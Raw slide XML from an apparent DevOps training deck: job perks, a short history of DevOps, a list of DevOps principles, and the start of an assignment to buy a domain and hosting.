            <a:endParaRPr sz="1850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-346075" lvl="0" marL="457200" rtl="0" algn="l">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Week 2 - Linux Administrations</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ESOP</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Extended Healthcare Plan (Medical, Disability, Dental &amp; Vision)</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Life insurance</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Paid Time Off Benefits</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Training &amp; Development Opportunities</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Performance incentives Bonus – Awards – Gifts</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Free access to gym</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Free snacks and drinks at the office</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Flexible holiday allowance paid into each pay cheque for you to accumulate and use as and when you wish</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Dental care</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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0" name="Shape 1950"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1951" name="Google Shape;1951;p317"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226350" y="1554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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DevOps Perks and Benefits</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1952" name="Google Shape;1952;p317"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="651925"/>
            <a:ext cx="8520600" cy="4302300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-346075" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="110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Competitive Salary</a:t>
            </a:r>
            <a:endParaRPr sz="1850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-346075" lvl="0" marL="457200" rtl="0" algn="l">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Work From Home – Flexible hours</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ESOP</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Extended Healthcare Plan (Medical, Disability, Dental &amp; Vision)</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Life insurance</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Paid Time Off Benefits</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Training &amp; Development Opportunities</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Performance incentives Bonus – Awards – Gifts</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Free access to gym</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Free snacks and drinks at the office</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Flexible holiday allowance paid into each pay cheque for you to accumulate and use as and when you wish</a:t>
            </a:r>
            <a:endParaRPr sz="1850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-346075" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1850"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Dental care</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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318"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="175225"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2930">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>History of DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1958" name="Google Shape;1958;p318"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196800" y="728850"/>
            <a:ext cx="8750400" cy="4194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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The DevOps movement began around 2007 when the IT operations and software development communities raised concerns about the traditional software development model. While agile methodologies were widely adopted by development teams to improve collaboration, among other benefits, the developers who wrote code often worked separately from the operations team that supported the code in production. This resulted in inefficient processes and a general lack of collaboration between these two siloed teams. </a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The remedy was DevOps, which bridges the gap between these teams so they work cohesively. DevOps brings together the skills, processes, and tools together from both development and operations teams.</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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319"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="175225"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2930">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>DevOps Principles</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1964" name="Google Shape;1964;p319"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623625" y="705225"/>
            <a:ext cx="5482500" cy="41949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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Collaboration</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Continuous Integration (CI)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Continuous Delivery (CD)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Infrastructure as Code (IaC)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Monitoring and Feedback</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Microservices and Containers</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Security (DevSecOps)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Scalability and Elasticity</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Culture of Continuous Improvement</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Version Control and Collaboration Tools</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Feedback Loops</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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320"/>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Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of Every DevOps Engineers</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1970" name="Google Shape;1970;p3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1787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOMAIN</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buy you own cheapest domain i.e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>www.anildollor.in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-331787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1625"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hosting</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1625">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buy your own cheapest hosting may be from contabo</a:t>
            </a:r>
            <a:endParaRPr sz="1625">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-331787" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
